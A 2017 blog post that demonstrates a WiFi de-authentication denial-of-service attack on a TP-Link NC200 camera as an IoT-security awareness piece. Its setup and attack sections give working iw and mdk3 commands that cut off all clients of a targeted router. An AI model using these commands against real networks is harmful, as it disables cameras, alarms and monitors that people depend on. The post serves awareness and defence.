Sunday 10 December 2017

IoT Security: Denial of Service Attack

In this post, I  demonstrate  a Denial of Service Attack that can be targeted towards any WiFi IoT device. In this case, I use a WiFi camera (TPLink's NC200 Camera) and show how easy it is to bring-it down and stop video streaming.  Not just the WiFi Camera, using this attack, one can bring-down any WiFi IoT device like Baby Monitor, Sprinkler, Motions Detectors, Fire Alarms etc. 

There can be many Denial of Service Attacks on WiFi protocol.  For this demo, I show De-authentication attack on a WiFi Camera. These attacks are very easy to generate and hence easy to bring-down the network. You don't need to know the Key / Password of the targeted WiFi Router.  

Most of the IoT devices come with a provision to monitor them remotely on your mobile using an app. With this kind of attacks, forget about receiving the IoT  alerts remotely  on your mobile app, you will not get alerts even if you are connected directly to the targeted WiFi Network.

Note: It is illegal to attack WiFi Networks. This post is for demonstration purpose and to make people aware of the attacks. 

Setup

The setup is as follows. 
  • A WiFi Router running OpenWRT's firmware.
  • TPLink's NC200 WiFi Camera is connected to the Router and streaming works perfectly fine.
  • Another OpenWRT Router to generate the Denial of Service Attacks. You need to install mdk3 onto this Router.   Lets call this Attacker Router. In fact, you can use any Linux Laptop too for this. It does n't need to be a Router. Usage of OpenWRT Router is my personal choice.

Attack Generation


The attack generation is very simple, as explained below.
  • As a first step,  you need to identify  the targeted AP's / Router's MAC Address. 
  • Goto Attacker Router's command prompt and  and copy the Router's MAC  into a temporary file ie echo E4:95:6E:42:00:0A > /tmp/black.txt
  • Create monitor interface and  issue the commands as shown below.

iw phy phy0 interface add mon0 type monitor
ifconfig mon0 up
mdk3 mon0 d -b /tmp/black.txt  -c 6

Thats it..  The above command de-authenticates all the connected clients from the targeted Router. The attack happens in such a way that the clients will not get any breathing space to do any meaningful data transmissions or receptions. 

Demo

We use TP-Link's NC200 camera for this. Demo Video is shown below. I have captured a rotating ceiling FAN to show a meaningful demo. Before the attack is generated,  you can see that FAN rotation is captured nicely. The moment the attack is generated (mdk3 command is given), streaming stops and you can see this as if the FAN is switched-off.


IoT Security: A Myth from Venkat on Vimeo.



It is as simple as that to bring down any IOT device or in fact the complete Network. Can't image the consequences though. Do we have products / solutions to detect or prevent this in IoT space? I know there are some enterprise grade solutions from companies like Mojo to detect (or mitigate some) some of these attacks.